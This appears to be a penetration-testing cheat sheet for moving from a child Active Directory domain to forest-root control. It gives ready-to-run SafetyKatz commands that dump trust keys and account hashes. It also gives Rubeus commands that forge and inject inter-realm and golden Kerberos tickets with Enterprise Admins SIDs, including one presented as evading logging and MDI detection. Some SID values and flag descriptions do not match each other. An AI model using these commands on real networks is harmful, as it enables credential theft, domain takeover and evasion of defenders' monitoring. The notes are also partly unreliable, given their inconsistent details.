child-to-forest-trust-key

Child to Forest Root - Trust Key

Methodology

1. Dump the trust key of the child domain (Credentials -> Hash NTLM).

2. Forge an inter-forest ticket.

3. Inject the ticket.

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Get the trust key:

SafetyKatz.exe '"lsadump::trust /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\techcorp$"'
SafetyKatz.exe '"lsadump::lsa /patch"'

Rubeus

Forge a interrealm TGT:

Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/TECHCORP.LOCAL /rc4:a6215eeb238da9262d014a529fe03adb /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /nowrap

where:

• silver - Creates a forged Silver Ticket (TGS) for service authentication.

• /user - Specifies the username to impersonate (e.g., Administrator).

• /ldap - Targets the LDAP service on Domain Controllers.

• /service - Specifies the service principal name (format: krbtgt/DOMAIN.LOCAL).

• /rc4 - Provides the NTLM hash of the trust key account for ticket signing .

• /sids - Adds Enterprise Admins SIDs to the ticket (e.g., Enterprise Admins S-1-5-21-...-519) .

Request a TGS:

Rubeus.exe asktgs /service:CIFS/techcorpdc.TECHCORP.LOCAL /dc:techcorp-dc.TECHCORP.LOCAL /ptt /ticket:

[!INFO] Different SPN and what they're used for:

• CIFS for directory browsing, copying files.

• HTTP for WinRS.

• HOST and CIFS for psexec.

• HOST and RPCSS for WMI.

• HOST and HTTP for PowerShell Remoting/WINRM.

• LDAP for dcsync

Child to Forest Root - krbtgt

We need to simply forge a Golden ticket (not an inter-realm TGT) with sIDHistory of the Enterprise Admins group.

Binaries

[!INFO] Remember to follow the Binaries methodology

Rubeus

Forge an interrealm golden ticket:

Rubeus.exe golden /user:Administrator /domain:us.techcorp.local /sid:S-1-5-21-2781415573-3701854478-2406986946 /krbtgt:a6215eeb238da9262d014a529fe03adb /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /groups:513 /ptt /nowrap

where:

• golden - Specifies Golden Ticket attack mode in Rubeus

• /user - Specifies the username to impersonate (e.g., Administrator)

• /domain - Targets the forest root domain (e.g., us.techcorp.local)

• /sid - Provides the current domain's SID

• /krbtgt - Uses the NTLM hash of the child domain's KRBTGT account

• /sids - Adds Enterprise Admins group SID (-519) for forest-wide privileges

• /ptt - Injects ticket directly into memory (Pass-the-Ticket)

• /nowrap - Outputs ticket without base64 line wrapping

Avoid suspicious logs and bypass MDI by using Domain Controller identity:

Rubeus.exe golden /user:us-dc$ /id:1000 /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /groups:513 /sids:S-1-5-21-2781415573-3701854478-2406986946-516,S-1-5-9 /aes256:5E3D2096ABB01469A3B0350962B0C65CEDBBC611C5EAC6F3EF6FC1FFA58CACD5 /dc:us-dc.us.techcorp.local /ptt

• S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers

• S-1-5-9 – Enterprise Domain Controllers